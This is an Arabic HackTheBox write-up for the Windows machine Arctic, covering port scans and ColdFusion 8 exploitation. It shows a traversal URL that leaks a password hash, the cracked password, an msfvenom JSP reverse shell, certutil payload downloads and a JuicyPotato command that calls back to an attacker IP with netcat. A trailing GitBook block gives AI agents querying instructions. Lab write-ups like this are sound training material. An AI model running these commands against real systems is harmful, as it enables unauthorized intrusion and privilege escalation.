> For the complete documentation index, see [llms.txt](https://hacking-notes.jord4n.pro/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://hacking-notes.jord4n.pro/ar/writeups-ctf/hackthebox/windows-easy/artic-hackthebox-writeup.md).

# تقرير HackTheBox عن Artic

{% hint style="warning" %}
**المهارات:**

* استغلال Adobe ColdFusion 8
* ثغرة اجتياز الدليل
* كسر التجزئات
* استغلال المهام المجدولة - إنشاء ملف JSP خبيث
* استغلال امتياز SeImpersonate (تصعيد الامتيازات)
  {% endhint %}

## الاستطلاع

**إعداد مساحة العمل:**

قم بإعداد مساحة العمل بإنشاء ثلاثة مجلدات لتخزين المحتوى المهم، والاستغلالات، ونتائج استطلاع Nmap.

<figure><img src="/files/1754c07110440628461bb7f21c5203a70eb5f4a7" alt="" width="563"><figcaption></figcaption></figure>

**فحص اتصال VPN**

تحقق من اتصال VPN لضمان تواصل مستقر مع الجهاز المستهدف.

<figure><img src="/files/60cc70eaf2464ad734e1e0d437ed14156ebab767" alt="" width="563"><figcaption></figcaption></figure>

**اكتشاف المنافذ المفتوحة باستخدام Nmap:**

قم بحصر المنافذ المفتوحة وتصدير النتائج إلى الملف "allPorts" في دليل Nmap:

```bash
nmap -p- --open -sS -n -Pn -vvv --min-rate 5000 10.10.10.11 -oG allPorts
```

<figure><img src="/files/91c235b80ab549fcdd09e0164a009ce09e04f910" alt=""><figcaption></figcaption></figure>

**تحليل المنافذ المفتوحة باستخدام extractPorts:**

استخدم الدالة extractPorts لعرض المنافذ المفتوحة بتنسيق موجز ونسخها إلى الحافظة.

<figure><img src="/files/bc33eae0cd261d3c76311eb146f161f27a9d3f44" alt="" width="563"><figcaption></figcaption></figure>

**فحص إصدارات المنافذ باستخدام Nmap:**

استخدم Nmap لفحص إصدارات الخدمات وحفظ الناتج في الملف "targeted":

```bash
nmap -sCV -p135,8500,49154 10.10.10.11 -oN targeted
```

<figure><img src="/files/a3e15ac65847921944ceb11ac09e9964d8a173f3" alt=""><figcaption></figcaption></figure>

## استغلال Adobe ColdFusion 8 (المنفذ 8500)

نلاحظ وجود خدمة إدارية متاحة على المنفذ 8500 تتطلب اسم مستخدم وكلمة مرور للاتصال بـ Adobe ColdFusion.

<figure><img src="/files/46303aebfe0f7be8e2233451cc619bba10ef71d2" alt=""><figcaption></figcaption></figure>

من خلال البحث عن الثغرات المرتبطة في `searchsploit`، نجد نصًا برمجيًا عاملًا لثغرة اجتياز الدليل.

<figure><img src="/files/ac9db32da3232315da4a266a02141ffc5fda6bfb" alt=""><figcaption></figcaption></figure>

`searchsploit -x multiple/remote/14641.py`

يكشف هذا النص البرمجي عن ثغرة LFI للوصول إلى قائمة كلمات المرور:

<figure><img src="/files/379196518be2eff7078dc41f8e826512637f4d4e" alt=""><figcaption></figcaption></figure>

`http://10.10.10.11:8500/CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../ColdFusion8/lib/password.properties%00en`

<figure><img src="/files/42ad15b56ab8bb9fa28c4824bb188d4167643aaa" alt=""><figcaption></figcaption></figure>

يحتوي الملف على القيمة التالية لكلمة المرور:

`password=2F635F6D20E3FDE0C53075A84B68FB07DCEC9B03`

<figure><img src="/files/ee2a7b1f338b41ef482d9b0a45e4ed40ef9aaa22" alt=""><figcaption></figcaption></figure>

### كسر كلمة المرور

{% embed url="<https://crackstation.net/>" %}

باستخدام CrackStation، نفك تشفير هذا التجزئة، وكلمة المرور هي `happyday`. يمكننا الآن الاتصال بنجاح.

<figure><img src="/files/df2193fcf12644bc4e8147f44591fda500411eb0" alt=""><figcaption></figcaption></figure>

### إنشاء مهمة مجدولة خبيثة

<figure><img src="/files/438b282f37693f7eed565df0270e6d5127472383" alt=""><figcaption></figcaption></figure>

في قسم المهام المجدولة، سننشئ مهمة جديدة لحفظ ملف خبيث في `C:/ColdFusion8/wwwroot/CFIDE` الدليل الذي نملك عليه صلاحيات القراءة/الكتابة.

<figure><img src="/files/789c4a55e611531fcb6f5efce8c5c0e67fd7c582" alt="" width="563"><figcaption></figcaption></figure>

**إنشاء ملف JSP:** بما أن الخادم يستطيع تفسير ملفات JSP، فسوف ننشئ غلاف JSP باستخدام `msfvenom`:

<figure><img src="/files/352303690a92d680c9c9ffc88391ee15b4fb273d" alt="" width="375"><figcaption></figcaption></figure>

<figure><img src="/files/83d2a37d6451a78594b6e18f56b2f731e5df2a5a" alt=""><figcaption></figcaption></figure>

```bash
msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.10 LPORT=443 -f raw > shell.jsp
```

**إضافة مهمة جديدة:** نقوم بإعداد المهمة المجدولة لتشغيل هذا الملف الخبيث.

<figure><img src="/files/c816fb3d526cf263e7ac782748f550f60dc59c8b" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/6ee2fc50e76c3a0ded8369c2edb1675fdb814ed5" alt="" width="563"><figcaption></figcaption></figure>

/*/* خادم HTTP لنقل الملف:/*/* لنقل ملف JSP، نشغّل خادم HTTP على جهازنا:

```bash
python3 -m http.server 80
```

<figure><img src="/files/09ae77fc3699b7365ab932d55792204a976c9357" alt=""><figcaption></figcaption></figure>

**الاستماع والتنفيذ:** نستمع على المنفذ 443 لاستقبال الصدفة العكسية ثم ننفذ المهمة المجدولة عند `/CFIDE/`:

```bash
rlwrap nc -nvlp 443
```

<figure><img src="/files/5e32f5041473bb6090e7819b4325cb709c351664" alt="" width="563"><figcaption></figcaption></figure>

<figure><img src="/files/fd88b1ce4d411e0f827bc0420caf6c907351c946" alt="" width="563"><figcaption></figcaption></figure>

### الراية user.txt :)

<figure><img src="/files/3e01e40d8e235e6b5760ab191ef97be44c2af306" alt="" width="563"><figcaption></figcaption></figure>

## تصعيد الامتيازات

### استغلال SeImpersonatePrivilege:

وجدنا أن المستخدم يمتلك `SeImpersonatePrivilege` الامتياز، مما يجعله عرضة لبعض تقنيات تصعيد الصلاحيات. يؤكد الأمر أدناه وجود هذا الامتياز:

```bash
whoami /priv
```

<figure><img src="/files/bfc51aedf457ecfcd5cbb6633cbdc79c1a942247" alt=""><figcaption></figcaption></figure>

لاستغلال هذه الثغرة، سنستخدم **JuicyPotato**، وهي أداة معروفة لاستغلال هذا الامتياز في بيئة Windows.

**تنزيل الأدوات المطلوبة**

{% embed url="<https://github.com/ohpe/juicy-potato/releases/tag/v0.1>" %}

{% embed url="<https://eternallybored.org/misc/netcat/>" %}

**بدء خادم HTTP** على جهاز الهجوم الخاص بنا لتقديم الملفات:

```bash
python3 -m http.server 8080
```

**نقل الملفات إلى الجهاز الهدف** باستخدام `certutil`:

```powershell
certutil.exe -f -urlcache -split http://10.10.14.10:8080/JP.exe
certutil.exe -f -urlcache -split http://10.10.14.10:8080/nc64.exe
```

<figure><img src="/files/81ad22dda653c7eb837372e014e48670afb026f1" alt=""><figcaption></figcaption></figure>

**تنفيذ JuicyPotato لتصعيد الامتياز**

سنقوم الآن بتشغيل JuicyPotato للحصول على جلسة بصلاحيات مرتفعة. يشغّل الأمر التالي JuicyPotato، والذي يشغّل `cmd.exe` بامتيازات عالية ويبدأ اتصالًا بجهاز الهجوم الخاص بنا عبر Netcat:

```powershell
./JP.exe -t * -l 1337 -p C:/Windows/System32/cmd.exe -a "/c C:/Windows/Temp/privesc/nc.exe -e cmd 10.10.14.10 1234"
```

**تسجيل الدخول إلى جلسة مرتفعة**

لالتقاط الاتصال، نستمع إلى المنفذ 1234:

```bash
rlwrap nc -nvlp 1234
```

<figure><img src="/files/7bf525aa70db6c2d8959c02c60f3945e40aa392d" alt="" width="563"><figcaption></figcaption></figure>

### فلاغ الجذر :)

<figure><img src="/files/a350299dbd1caea29b73a2eafcaaee4a7c7be0f8" alt="" width="563"><figcaption></figcaption></figure>

<figure><img src="/files/de4ab7eea66bcbade3225deec5e682b07d086203" alt="" width="525"><figcaption></figcaption></figure>


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://hacking-notes.jord4n.pro/ar/writeups-ctf/hackthebox/windows-easy/artic-hackthebox-writeup.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
